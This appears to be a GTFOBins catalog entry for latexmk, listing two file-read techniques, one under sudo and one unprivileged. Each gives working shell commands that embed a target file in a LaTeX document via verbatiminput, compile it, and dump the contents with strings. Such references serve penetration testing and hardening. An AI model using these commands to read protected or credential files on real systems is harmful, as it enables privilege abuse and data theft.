Catalog GTFOBins

GTFO · Tool

latexmk

6 techniques LinuxGTFOBins GPL-3.0

file-read

File ReadPrivilege Escalation Linux

The read file will be part of the output.

echo '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{/path/to/input-file}\end{document}' >/path/to/temp-file
latexmk -dvi /path/to/temp-file
strings temp-file.dvi
Context
sudo
Native
file-read
MITRE
T1005

file-read

File Read Linux

The read file will be part of the output.

echo '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{/path/to/input-file}\end{document}' >/path/to/temp-file
latexmk -dvi /path/to/temp-file
strings temp-file.dvi
Context
unprivileged
Native
file-read
MITRE
T1005